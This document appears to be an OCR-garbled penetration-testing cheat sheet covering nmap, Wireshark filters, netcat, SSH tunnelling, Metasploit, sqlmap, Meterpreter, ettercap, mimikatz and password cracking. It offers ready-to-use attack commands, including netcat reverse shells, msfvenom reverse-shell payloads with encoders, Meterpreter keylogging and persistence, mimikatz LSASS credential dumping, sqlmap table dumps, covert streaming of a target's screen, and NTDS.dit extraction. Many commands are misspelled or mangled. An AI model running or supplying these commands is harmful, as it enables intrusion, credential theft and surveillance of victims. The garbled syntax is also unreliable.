Comment on page
Tool Syntax
Switch Explanation | Text |
|---|---|
-sp | Scan with ping |
-sS | Scanning with syn |
-sT | Scanning with connection |
-sU | Scanning with udp |
-so | Scanning with protocol |
-sv | Scanning along with versions |
-sC | Scanning with traceroute |
-T4 Setting the scanning speed between 0 and 5 | |
-oA | Scanning output with all formats |
-iL list.txt | Scan the contents of the list |
Switch Explanation | Text |
|---|---|
-ox file | Write inside the xml file |
-oG file | Writing inside the grep file |
-oA file | Storage with 3 formats |
-iL file | Reading hosts from inside my file |
-exclude file file | Except for the hosts in the file |
Switch Explanation | Text |
|---|---|
-sV -p โscript=banner | Banners |
โtraceroute | Draw a route map |
โttl | ttl code |
โscript | Script |
Switch Explanation | Text |
|---|---|
-f | Crossed fasteners |
-s ip | source spoof |
-g # | spoof source port |
-D ip , ip | Bait |
โmtu # | Setting the MTU size |
โspoof-mac mac | spoof mac address |
โdata-length size | Size |
โscan-delay script | Script |
โmin-rate=X | Determining the minimum number of requests sent per second |
xsltproc nmap.xml -o nmap.html
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f
5 live hosts.txt
ndiff scanl.xml scan2.xml
nmap -R -sL -dns-server server 1.1.1.0/24
for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done
name | Explanation |
|---|---|
List of shared routes smb-enum-shares.nse |
Filter Explanation | Text |
|---|---|
eth.addr/eth.dst.eth.src | Mac |
rip.auth.passwd | Password RIP |
ip.addr/ip.dst/ip.src (ipv6.) | IP |
tcp.port/tcp.dstport/tcp.srcport | TCP ports |
tcp.flags (ack,fin,push,reset,syn,urg) | TCP flags |
udp.port/udp.dstport/udp.srcport | UDP ports |
http.authbasic | Basic authentication authentication |
http.www_authentication | Authentication of HTTP authentication |
http.data | HTTP data |
http.cookie | HTTP cookies |
http.referer | HTTP referrer path |
http.server | HTTP servers |
http.user agent | The user-agent section in HTTP |
wlan.fc.type eq 0 | 802.11 management frame |
wlan.fc.type eq 1 | 802.11 control frame |
wlan.fc.type eq 0 | 802.11 data frames |
wlan.fc.type subtype eq 0 (1=reponse) | 802.11 association request |
wlan.fc.type_subtype eq 2 (3=response) | 802.11 reassociation req |
wlan.fc.type_subtype eq 4 (5=response) | 802.11 probe request |
wlan.fc.type_subtype eq 8 | 802.11 beacon |
wlan.fc.type subtype eq 10 | 802.11 disassociate |
wlan.fc.type=subtype eq 11 (12=deauthenticate) | 802.11 authentication |
eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =
and OR &&
or OR ||
xor OR ^^
not OR!
Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]
โ
Start Listener:
$ nc -1 -p [port]
./ncat - l 3128 -proxy -type http &
TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]
send file
nc.exe 10.10.10.10 < "file.log"
โ
download file
nc -vnlp 1234 > file.txt
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port] [filename]
โ
Push a [filename] to Listener:
1. Start Listener to pull [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
$nc -w3 [TargetiP] [port] [filename]
Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe
Use cvlc \(command line VLC\) on target to migrate popups
# Start a listener on the attacker machine
vlc udp://@:1234
โ
-- OR --
โ
# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep
โ
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep
# Start a listener on the attacker machine
vlc http://server.example.org:BOBO
โ
-- OR --
โ
# Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#
transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
rate=44100):file{dst=test.mp4)
โ
# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep
# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
โ
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"
/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys
โ
If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES
ssh [email protected] -p 8222
ssh -R 4446:127.0.0.1:3128 [email protected]
http 127.0.0.1 4446
ssh -R8080:12-.0.0.1:443 [email protected].
ssh -18080:3.3.3.3:443 [email protected]
ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS
Command | Description |
|---|---|
msfconsole r file.rc | Load resource file |
msfcli | grep exploit/window | List of Windows exploits |
rnsfencode -l | list of encodes |
msfpayload -h | List of payloads |
show exploits | Display exploits |
show auxiliary | show auxiliary module |
show payloads | Show payloads |
search string | Search for a specific string |
search exploit string | Search exploits |
searchsploit -m exploits/php/webapps/45161.py | Copy the Xploit file in the current path |
info module | Display module information |
use module | Load Xploit or Module |
show options | Display module properties |
show advanced | Show advanced settings |
set option value | Set value |
sessions -v | List of meetings: -k # (delete)
-u # (Update Meterpreter) |
sessions -s script | Run the Meterpreter script in all sessions |
jobs -l | List all jobs (-k # - kill) |
exploit -j | Run exploit as job |
route add ip nmask sid | Rotation or Pivoting |
loadpath /home/modules | Load tradeparty tree |
irb | shell ruby implementation |
connect -s ip 443 | connect to ssl (NC clone) |
route add ip mask session id | added route ยทin the pivot |
exploit/multi/handler - set ExitOnSession False | Show more settings Shells |
set ConsoleLogging true (also SessionLogging) | Enable reporting |
sqlmap.py -u "http://url?id=1&str=val"
sqlmap.py -u "http://url" --data="id=1&str=val"
sqlmap.py -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"
1. Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http:// url "--data="id=l&str=val" -p "id"
--cookie="cookiel=vall;cookie2=val2"
./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db
--current-user
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D
"testdb"
sqlmap.py -u "http://url" --data="id=l&str=val" -p "id" --columns -T
"users"
sqlmap.py -r req.txt
sqlmap -r req -D openemr -T users_secure --dump
sqlmap -r req --technique=T
sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns
./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5
./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X
cb.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war
msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1
LPORT=443 callback.exe
/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
โ
--- Kali ---
# service postgresql start
# service metasploit start
msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID
msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
# RHOSTS
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open
Command | Explanation |
Help | List of available commands |
sysinfo | Display system information |
p.s List of processes | |
getpid | List of available PID |
upload file C:\Program Files\ | Upload file |
download file | Get the file |
reg command | Interaction with the registry |
rev2self | Back to main user |
shell | Transfer to interactive shell |
migrate PID | Change to another PID |
background | The current process behind the background |
keys can (start|stop|dump) | Start/stop/delete keylogger |
execute -f cmd.exe -i | Run cmd.exe and interact with it |
execute -f crnd.exe -i -H -t | Run cmd.exe as a hidden process and get all the tokens |
has dump | Get all local hashes |
run script | Running the script (/scripts/meterpreter) |
port fwd [add I delete] -lL 127.0.0.1 443 -r 3.3.3.3 -p 3389 | Create port forward on port 3389 in the current session and remote desktop access on port 443 |
use priv
getsystem
use incognito
list tokens -u
impersonate token domain\\user
1. msf sessions #Note Meterpreter ID
2. msf route add 3.3.3.0 255.255.255.0 id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 127.0.0.1 9050
iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3
meterprete irb
client.railgun.user32.MessageBoxA(O,"got","YOU","MB_OK")
msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set PAYLOAD_TYPE TCPIHTTPIHTPS
msf set REXENAHE filename
msf set SESSION meterpreter session id
msf set STARTUP SERVICE
meterpreter run post/windows/gather/dumplinks
execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'
ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443
ettercap -T -M arp -F filter // //
ettercap -TP rand flood
etterfilter filter.filter -o out.ef
if lip.proto == UDP && udp.dst == 500) I
drop();
kill(); }
if I ip.src == 'ip' ) (
if (tcp.dst == 80) (
if (search(DATA.data, "Accept-Encoding")) (
replace("Accept-Encoding","Accept-Rubbish!");
msg("Replaced Encoding\n");
}
}
}
1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords
Or
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
Or
#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
hping3 targetiP --flood --frag --spoof ip --destport # --syn
./arping -I eth# -a # arps
ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe
GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot
hydra -1 ftp -P words -v targetiP ftp
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
$ ./john -wordfile:pw.lst -format: format hash.txt
$ john --format~des username:SDbsuge8iC58A
$ john --format~lm username:$L~$a9c604d244c4e99d
$ john --format~md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1
โ
$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D
โ
# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLM$ll22334455667788$0836F0858124F338958"5F81951905DD2F85252CC7
318825
username:$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC7
318825:::::::
โ
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT $8366A4E9E68"2C80
username:ROOT $8366A4E9E68"2C80
โ
$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
โ
$ john --format=sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
โ
$ john --format=zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4
#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt
โ
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt
โ
generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copj
a. cscript vssown.vbs /start (optional)
b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
a. Copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
ntds\ntds.dit.
b. copj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
System32\config\SYSTEM.
C. COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
system32\config\SAM.
4. Copj files to attack box.
5. Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
6. Configure and Make source code for libesedb from the extracted package
a. cd libesdb
b. chmod +x configure
c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
a. cd esedbtools
b. . I esedbdumphash ../../ntds.dit
MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes
http://isc.sans.edu/tools/hashsearch.html
# dig +short md5 .md5.dshield.org TXT
Result = "filename I source" i.e. "cmd.exe I NIST"
http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'
https://fileadvisor.bit9.com/services/search.aspx
https://www.virustotal.com/#search
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip
crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>
crackmapexec smb <IP> -u <USER> -p <PASS> --shares
mssqlclient.py -port 1433 [email protected]
powershell iwr -usebasicparsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe
โ
๐๐ข๐๐๐๐ก๐ ๐๐๐ก ๐๐๐
./๐๐ข๐๐๐๐ก๐ ๐๐ข๐กโ ๐๐๐ โ ๐ ๐๐ฅ๐๐ ๐๐๐๐
./๐๐ข๐๐๐๐ก๐ ๐๐ฅ๐๐ โ ๐๐ก ๐ ๐๐๐ ๐๐ก๐๐ฃ๐ โ ๐๐๐ /๐๐๐/๐๐๐ โ
kubectl get nodes -o wide
python rsf.py -m discovery